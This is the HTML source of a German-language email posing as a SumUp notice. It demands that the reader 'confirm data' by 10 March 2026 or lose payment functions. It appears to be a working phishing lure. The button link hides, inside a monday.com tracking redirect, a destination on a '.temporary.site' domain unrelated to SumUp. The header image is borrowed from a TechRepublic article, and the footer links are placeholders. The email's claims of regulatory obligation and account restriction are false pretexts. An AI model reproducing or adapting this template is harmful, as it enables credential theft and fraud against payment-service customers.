<InvalidTag charset="UTF-8" />
<InvalidTag content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes" name="viewport" />
<title></title>
<style type="text/css">/* RESET STYLES */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
        }
        
        /* BODY */
        body {
            background-color: #f2f4f8;
            padding: 20px;
            margin: 0;
            -webkit-text-size-adjust: 100%;
            -ms-text-size-adjust: 100%;
        }
        
        /* CONTAINER */
        .container {
            max-width: 600px;
            width: 100%;
            margin: 0 auto;
            background: #ffffff;
            border-radius: 16px;
            overflow: hidden;
            border: 1px solid #e0e5ec;
            box-shadow: 0 8px 20px rgba(0, 0, 0, 0.05);
        }
        
        /* HEADER */
        .header {
            background: #ffffff;
            padding: 30px 35px 20px 35px;
            border-bottom: 1px solid #eaedf2;
        }
        
        .header img {
            width: 130px;
            height: auto;
            display: block;
        }
        
        /* CONTENT */
        .content {
            padding: 30px 35px 25px 35px;
            color: #1e2a3a;
            line-height: 1.6;
            font-size: 15px;
        }
        
        h1 {
            color: #000000;
            font-size: 22px;
            font-weight: 600;
            margin-bottom: 20px;
            letter-spacing: -0.3px;
            border-left: 4px solid #000000;
            padding-left: 15px;
        }
        
        p {
            margin-bottom: 18px;
            color: #2c3e50;
        }
        
        strong {
            color: #000000;
            font-weight: 600;
        }
        
        /* HIGHLIGHT BOX */
        .deadline-box {
            background-color: #f8fafd;
            border: 1px solid #e2e8f0;
            border-radius: 12px;
            padding: 20px 25px;
            margin: 25px 0;
            text-align: center;
        }
        
        .deadline-title {
            font-size: 16px;
            font-weight: 600;
            color: #000000;
            margin-bottom: 8px;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }
        
        .deadline-date {
            font-size: 28px;
            font-weight: 700;
            color: #000000;
            margin: 10px 0;
            border-bottom: 2px solid #000000;
            display: inline-block;
            padding-bottom: 5px;
        }
        
        .deadline-text {
            color: #4a5568;
            font-size: 15px;
            margin-top: 10px;
        }
        
        /* BLACK BUTTON */
        .button-container {
            text-align: center;
            margin: 30px 0 20px 0;
        }
        
        .button {
            background-color: #000000;
            color: #ffffff !important;
            padding: 16px 40px;
            text-decoration: none;
            border-radius: 50px;
            display: inline-block;
            font-weight: 600;
            font-size: 16px;
            letter-spacing: 0.3px;
            border: none;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
            -webkit-tap-highlight-color: transparent;
        }
        
        .button:hover {
            background-color: #222222;
        }
        
        /* WARNING SECTION */
        .warning-box {
            background-color: #fef8f8;
            border: 1px solid #f0dcdc;
            border-radius: 10px;
            padding: 20px 25px;
            margin: 25px 0 20px 0;
        }
        
        .warning-title {
            font-weight: 600;
            color: #b91c1c;
            margin-bottom: 12px;
            font-size: 16px;
        }
        
        .warning-list {
            list-style: none;
        }
        
        .warning-list li {
            margin-bottom: 10px;
            padding-left: 20px;
            position: relative;
            color: #2d3748;
        }
        
        .warning-list li:before {
            content: "–";
            position: absolute;
            left: 0;
            color: #b91c1c;
            font-weight: 600;
        }
        
        .note-small {
            color: #718096;
            font-size: 13px;
            margin-top: 15px;
            font-style: italic;
        }
        
        /* FOOTER */
        .footer {
            background-color: #f8fafc;
            padding: 25px 35px;
            color: #4a5568;
            font-size: 12px;
            border-top: 1px solid #e2e8f0;
            text-align: center;
            line-height: 1.6;
        }
        
        .footer-links {
            margin: 15px 0 10px 0;
        }
        
        .footer-links a {
            color: #4a5568;
            text-decoration: underline;
            margin: 0 10px;
            font-size: 12px;
        }
        
        .footer p {
            margin-bottom: 6px;
            color: #4a5568;
            font-size: 12px;
        }
        
        .footer-small {
            font-size: 11px;
            color: #718096;
            margin-top: 15px;
        }
        
        /* RESPONSIVE */
        @media screen and (max-width: 500px) {
            body {
                padding: 10px;
            }
            
            .header {
                padding: 20px 20px 15px 20px;
            }
            
            .header img {
                width: 110px;
            }
            
            .content {
                padding: 20px 20px 15px 20px;
            }
            
            h1 {
                font-size: 20px;
                padding-left: 12px;
            }
            
            .deadline-date {
                font-size: 24px;
            }
            
            .button {
                padding: 16px 30px;
                width: 100%;
                display: block;
                font-size: 16px;
            }
            
            .warning-box {
                padding: 15px 18px;
            }
            
            .footer {
                padding: 20px 20px;
            }
            
            .footer-links a {
                display: inline-block;
                margin: 5px 8px;
            }
        }
        
        @media screen and (max-width: 360px) {
            h1 {
                font-size: 18px;
            }
            
            .deadline-date {
                font-size: 22px;
            }
        }
</style>
<div class="container"><!-- HEADER -->
<div class="header"><img alt="8 Top Square Competitors Evaluated By Experts" src="https://assets.techrepublic.com/uploads/2024/10/sumup.jpg" />​</div>
<!-- CONTENT -->

<div class="content">
<h1>Letzte Erinnerung: Bitte bestätigen Sie Ihre Daten</h1>

<p>Sehr geehrte Kundin, sehr geehrter Kunde,</p>

<p>als reguliertes Finanzinstitut sind wir gesetzlich verpflichtet, regelmäßig die Identität unserer Kunden zu überprüfen. Dies dient der Sicherheit Ihres Kontos und der Einhaltung gesetzlicher Vorschriften (Geldwäschegesetz).</p>

<p>Trotz mehrerer vorheriger Benachrichtigungen konnten wir Ihre Daten bisher nicht bestätigen.</p>

<div class="deadline-box">
<div class="deadline-title">Frist</div>

<div class="deadline-date">10. März 2026</div>

<div class="deadline-text">Bitte bestätigen Sie Ihre Daten bis zum <strong>10. März 2026</strong>, um die uneingeschränkte Nutzung Ihres Kontos zu gewährleisten. Andernfalls müssen wir Ihren Zugang gemäß unseren Allgemeinen Geschäftsbedingungen vorübergehend einschränken.</div>
</div>

<div class="button-container"><a class="button" href="https://trackingservice.monday.com/tracker/link?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJvcmlnaW5hbFVybCI6Imh0dHBzOi8vZnluLnpveS50ZW1wb3Jhcnkuc2l0ZS9zLXZlcmlmP2owOTg9IiwiZW1haWxJZCI6ImEyYmE1ZmYwLTk2ZjktNGRkNi05NjU4LWVjYWMzNGRlZGQ2YSIsImlhdCI6MTc3MjU3MTY0NX0.rWKSEfBosKp7gavbHUDba86SPAbOw4W5slc_2PAkb8A&r=euc1">JETZT DATEN BESTÄTIGEN</a></div>

<div class="warning-box">
<div class="warning-title">Nach dem 10. März 2026 nicht mehr verfügbar:</div>

<ul class="warning-list">
        <li>Zahlungen auslösen</li>
        <li>Zahlungen empfangen</li>
        <li>Guthaben aufladen</li>
</ul>

<p style="margin-top: 15px; color: #2d3748;">Sie können weiterhin mit Ihrer SumUp-Karte bezahlen und Bargeld abheben.</p>
</div>

<p>Mit freundlichen Grüßen</p>

<p><strong>Ihr SumUp Team</strong></p>

<p class="note-small">Diese E-Mail wurde automatisch generiert. Bitte antworten Sie nicht auf diese Nachricht.</p>
</div>
<!-- FOOTER -->

<div class="footer">
<p><strong>SumUp Limited</strong><br />
Block 8, Harcourt Centre, Charlotte Way, Dublin 2, D02 K580, Irland</p>

<p style="font-size: 11px; margin-top: 8px;">SumUp Limited ist ein E-Geld-Institut, zugelassen und reguliert durch die Zentralbank von Irland (Referenznummer C195030).</p>

<div class="footer-links"><a href="#">AGB</a> | <a href="#">Datenschutz</a> | <a href="#">Impressum</a></div>

<p>© 2026 SumUp Limited. Alle Rechte vorbehalten.</p>

<p class="footer-small">Sie erhalten diese E-Mail, weil Sie SumUp-Kunde sind und Ihre Daten noch nicht bestätigt haben.</p>
</div>
</div>